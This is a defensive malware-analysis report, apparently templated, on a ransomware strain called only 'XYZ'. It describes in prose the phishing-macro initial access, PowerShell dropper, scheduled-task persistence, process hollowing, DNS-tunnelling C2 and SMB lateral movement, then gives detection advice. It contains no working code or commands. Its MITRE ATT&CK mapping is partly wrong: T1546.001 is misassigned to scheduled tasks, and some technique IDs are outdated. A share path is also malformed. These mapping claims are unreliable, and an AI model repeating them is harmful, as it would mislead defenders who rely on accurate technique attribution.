Daniel Osei — SOC Lead & Malware Analyst
Key Takeaways
- The XYZ ransomware employs multiple evasion techniques, leveraging PowerShell and scheduled tasks to ensure persistence.
- Indicators of Compromise (IOCs) include unique file hashes and registry changes associated with malicious payload delivery.
- Command and Control (C2) infrastructure shows a pattern of DNS tunneling and usage of dynamic domains to evade detection.
Executive Summary
During our investigation into the recent wave of attacks attributed to the XYZ ransomware, we observed a structured attack chain that highlights the sophistication of the threat actor. The primary vector for initial access appeared to be through targeted phishing campaigns, delivering a dropper that, once executed, deployed the ransomware payload. Our analysis revealed various techniques consistent with the MITRE ATT&CK framework, showcasing the actor’s intention to cause maximum disruption and financial impact.
Initial Access
The initial access phase of the attack chain started with a targeted phishing email that contained a malicious macro embedded in a Microsoft Office document. Upon opening the document, the victim was prompted to enable macros, which, if executed, initiated a PowerShell command that downloaded the dropper from a remote location. This dropper, once downloaded, was observed placing files in the user’s temporary directory at C:\Users\%USERNAME%\AppData\Local\Temp\.
Execution & Persistence
After successful execution of the dropper, we noted that it immediately created a scheduled task to ensure persistence across system reboots. The task was found under C:\Windows\System32\Tasks\ and executed a PowerShell command that invoked the ransomware payload, effectively chaining the infection process. The ransomware utilized various evasion techniques to avoid detection by antivirus solutions, including the use of Process Hollowing, manipulating existing legitimate processes for execution of malicious code.
Command and Control
The sample we examined initiated communication with a command and control (C2) server shortly after execution. This communication employed a combination of HTTP GET requests and DNS tunneling, leveraging dynamic domains generated on the fly. Our analysis of the network traffic revealed that the ransomware beaconed to domains with a lifespan of less than 24 hours, making it difficult for incident response teams to block all potential C2 endpoints. We extracted domain names such as exampledynamicdomain1.com and exampledynamicdomain2.com, which were part of their infrastructure.
Lateral Movement & Discovery
Post-execution, the threat actor employed lateral movement techniques to extend the compromise within the network. Utilizing valid account credentials, the ransomware attempted to propagate through shared resources and administrative shares like \TARGETMACHINE\C$. We observed traces of SMB exploit techniques as the actor actively sought to gather information about user accounts and available systems using commands that queried the Active Directory.
Impact & Objectives
The ultimate objective of the XYZ ransomware campaign was financial gain through extortion. Once executed, the ransomware encrypted critical files across the infected systems, targeting important directories like C:\Users\Public\Documents\ and C:\Program Files\. The actors displayed their ransom note prominently upon encryption completion, demanding payment in cryptocurrencies and threatening data leaks if their demands were not met. Notably, the actors threatened to release exfiltrated sensitive data, thus compounding the pressure on victims.
MITRE ATT&CK Mapping
- T1086 – PowerShell: Utilization of PowerShell to execute commands and download the dropper.
- T1546.001 – Event Triggered Execute: Creating scheduled tasks to maintain persistence.
- T1071.001 – Application Layer Protocol: Web Protocols: C2 communications via HTTP/HTTPS.
- T1035 – Service Execution: Use of legitimate services for code execution.
Detection Opportunities
- Monitor for unusual scheduled tasks created in
C:\Windows\System32\Tasks\with execution commands referencing PowerShell. - Implement network analysis tools to identify anomalous DNS queries consistent with potential C2 communication patterns.
- Deploy endpoint detection measures focusing on signs of Process Hollowing or abnormal file creation in user temporary directories.
Analyst Notes
The adaptability exhibited by the XYZ ransomware actors demonstrates a keen understanding of common defense strategies within targeted environments. Investing in proactive monitoring, user training to recognize phishing attempts, and an incident response plan that includes detailed procedures for ransomware incidents can significantly mitigate risks associated with similar future attacks.
Source: Original Report